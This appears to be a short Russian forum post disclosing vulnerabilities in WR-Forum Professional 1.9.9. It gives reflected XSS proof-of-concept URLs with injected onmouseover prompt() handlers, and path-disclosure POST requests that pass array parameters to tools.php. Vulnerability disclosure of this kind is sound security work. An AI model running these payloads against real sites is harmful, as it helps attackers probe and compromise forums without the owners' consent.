Представляю отчёт об уязвимостях, найденных мною в WR-Forum Professional 1.9.9 .1.Пассивная XSS http://site.com/talk/pm.php?readpm&id=usver' onmouseover=prompt(/XSS/) bad=' http://site.com/talk/index.php/'onmouseover='prompt(/XSS/)'bad=' .2.Раскрытие путей .2.1 http://site.com/talk/tools.php?event=reg2 POSTDATA email[]=[email protected]&name[]=Myl33tNickName&pass=Myl33tPWD&pol=bla bla bla&stime=Myl33tNum&usernum[]=Myl33tNum&xkey=Myl33tNum .2.2 http://site.com/talk/tools.php?find&event=go POSTDATA findme[]=the&ftype=0&gdefinder=1&withregistr=on .2.3 http://site.com/talk/tools.php?event=givmepassword POSTDATA myemail[]=sample%40email.tst&myname[]=Myl33tNickName .2.4 http://site.com/talk/tools.php?event=regenter POSTDATA name[]=Myl33tNickName&pass[]=Myl33tPWD Как-то так. Возможно в тему будет что нибудь добавляться.
